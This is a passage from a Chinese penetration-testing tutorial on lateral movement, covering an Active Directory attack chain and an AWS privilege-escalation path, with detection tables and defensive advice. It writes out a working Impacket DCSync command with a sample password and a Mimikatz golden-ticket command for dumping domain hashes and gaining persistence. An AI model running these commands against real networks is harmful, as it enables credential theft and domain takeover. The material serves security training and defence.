│ 结果：成功访问，发现敏感财务数据                         │
└─────────────────────────────────────────────────────────┘
                    ↓
Step 6: 横向移动 - 第二跳
┌─────────────────────────────────────────────────────────┐
│ 目标：域控制器 (192.168.10.2)                           │
│ 方法：DCSync 攻击                                        │
│ 工具：Impacket secretsdump.py                           │
│ 命令：python3 secretsdump.py CORP/finance_user@192.168.10.2 │
│                  -password 'Password123!'               │
│ 结果：获取所有域用户哈希，包括 krbtgt                   │
└─────────────────────────────────────────────────────────┘
                    ↓
Step 7: 持久化
┌─────────────────────────────────────────────────────────┐
│ 方法：Golden Ticket (金票攻击)                          │
│ 工具：Mimikatz                                          │
│ 命令：kerberos::golden /user:admin /domain:CORP        │
│                  /sid:S-1-5-21-...                      │
│                  /krbtgt:hash /ptt                      │
│ 结果：获得永久域管理员访问权限                           │
└─────────────────────────────────────────────────────────┘
```

#### 检测结果分析

| 阶段 | 检测到的活动 | 告警级别 | 响应时间 |
|------|--------------|----------|----------|
| 初始访问 | 恶意宏执行 | 高 | 2 小时 |
| 权限提升 | 异常进程创建 | 中 | 未检测 |
| 凭证提取 | LSASS 访问 | 高 | 4 小时 |
| 横向移动 | SMB 异常连接 | 中 | 未检测 |
| DCSync | 异常目录访问 | 高 | 8 小时 |
| 金票攻击 | 未检测 | - | - |

#### 改进建议

1. **启用 LSASS 保护**: 配置 Windows Defender Credential Guard
2. **部署 EDR**: 实时检测 Mimikatz 等工具
3. **网络分段**: 财务网络与办公网络隔离
4. **特权账户保护**: 域管理员不在工作站登录
5. **监控 DCSync**: 配置目录服务访问审计

### 案例二：云环境横向移动

#### 场景描述

某云原生企业的 AWS 环境中，攻击者通过泄露的 Access Key 获得了初始访问权限，目标是评估云内横向移动风险。

#### 渗透路径

```
Step 1: 初始访问
- 使用泄露的 Access Key 访问 AWS
- 身份：EC2 实例角色 (有限权限)

Step 2: 信息收集
aws sts get-caller-identity
aws iam list-attached-role-policies --role-name ec2-role
aws ec2 describe-instances

Step 3: 发现过度权限
- 发现角色具有 s3:* 权限
- 访问敏感 S3 桶，发现备份的数据库凭证

Step 4: 权限提升
- 使用数据库凭证访问 RDS 实例
- 发现存储的应用配置，包含 Lambda 执行权限

Step 5: 横向移动
- 使用 Lambda 执行任意代码
- 获取更高权限的 IAM 角色
- 最终获得 AdministratorAccess

Step 6: 数据窃取
- 访问所有 S3 桶
- 导出所有 RDS 数据库
- 下载所有 Secrets Manager 密钥
```

#### 防御建议

1. **最小权限 IAM**: 遵循最小权限原则配置 IAM
2. **启用 CloudTrail**: 记录所有 API 调用
3. **配置 GuardDuty**: 检测异常行为
4. **S3 桶策略**: 限制跨账户访问
5. **密钥轮换**: 定期轮换 Access Key
6. **网络隔离**: 使用 VPC 端点限制访问

---

## 总结与思考

### 核心要点回顾

1. **横向移动是渗透测试的核心阶段**
   - 从初始访问点到高价值目标的关键路径
   - 模拟 APT 攻击的必要环节
   - 评估内网防御能力的重要手段

2. **Windows 环境主要技术**
   - PsExec、WMI、WinRM 远程执行
   - Pass-the-Hash、Pass-the-Ticket 凭证传递
   - RDP、SMB、DCOM 协议利用
   - 域环境：DCSync、Golden/Silver Ticket

3. **Linux 环境主要技术**
   - SSH 密钥和凭证滥用
   - NFS、数据库远程连接
   - 配置不当的服务

4. **云环境特殊考虑**
   - IAM 权限滥用
   - 元数据服务凭证窃取
   - 跨服务横向移动

5. **检测与防御**
   - 启用详细日志记录
   - 网络分段和最小权限
   - 多因素认证
   - SIEM 监控和响应

### 深入思考

#### 为什么横向移动难以检测？

1. **合法工具滥用**: PsExec、WMI、PowerShell 都是合法管理工具
2. **凭证合法**: 使用窃取的合法凭证，认证日志显示"正常"
3. **加密流量**: SMB、RDP 等协议加密，难以内容检测
4. **低频慢速**: 攻击者放慢速度，避免触发阈值告警
5. **域环境复杂性**: 正常管理活动与攻击行为难以区分

#### 如何平衡可用性与安全性？

在企业环境中，我必须考虑：

1. **管理需求**: 管理员需要远程管理工具
2. **用户体验**: 过度限制影响工作效率
3. **检测误报**: 过多误报导致告警疲劳
4. **成本考量**: 完整的安全方案成本高昂

#### 未来趋势

1. **零信任架构**: 不信任任何网络位置，持续验证
2. **行为分析**: 使用 ML/AI 检测异常行为模式
3. **微隔离**: 更细粒度的网络分段
4. **云原生安全**: 针对云环境的专用检测方案
5. **自动化响应**: SOAR 自动阻断可疑活动

### 实战建议

1. **对红队人员**:
   - 优先使用隐蔽技术 (WMI > PsExec)
   - 记录所有移动路径便于清理
   - 避免触发生产环境告警
   - 测试客户的检测和响应能力

2. **对蓝队人员**:
   - 建立网络基线，识别异常
   - 启用详细日志，特别是 PowerShell
   - 部署 EDR 检测工具使用
   - 定期演练检测和响应流程

3. **对组织**:
   - 实施网络分段
   - 强制多因素认证
   - 定期权限审查
   - 投资 SIEM 和威胁情报

---

## 参考资料

### 学习资源

- **MITRE ATT&CK - Lateral Movement**
  - https://attack.mitre.org/tactics/TA0008/

- **SANS Institute - Lateral Movement**
  - https://www.sans.org/white-papers/lateral-movement/

- **BloodHound Documentation**
  - https://bloodhound.readthedocs.io/

### 工具资源

| 工具 | 用途 | 链接 |
|------|------|------|
| **Mimikatz** | 凭证提取 | https://github.com/gentilkiwi/mimikatz |
| **Impacket** | 协议实现 | https://github.com/SecureAuthCorp/impacket |
| **CrackMapExec** | 内网扫描 | https://github.com/byt3bl33d3r/CrackMapExec |
| **PowerView** | 域侦察 | https://github.com/PowerShellMafia/PowerSploit |
| **BloodHound** | 域分析 | https://github.com/BloodHoundAD/BloodHound |
| **Rubeus** | Kerberos 攻击 | https://github.com/GhostPack/Rubeus |
| **SharpHound** | 数据收集 | https://github.com/BloodHoundAD/SharpHound |

### 书籍推荐

1. **《Red Team Development and Operations》**
   - 章节: Lateral Movement in Active Directory Environments

2. **《Advanced Penetration Testing》**
   - 章节: Pivoting and Lateral Movement

3. **《Blue Team Handbook: Incident Response Edition》**
   - 章节: Lateral Movement Detection

4. **《Detecting Lateral Movement with Event Logs》**
   - 作者: JPCERT/CC

---

*365 天信息安全技术系列 | Day 231 | 渗透测试系列 | 横向移动技术*
*创建时间：2026-04-12 | 作者：安全专家 · 严谨专业版*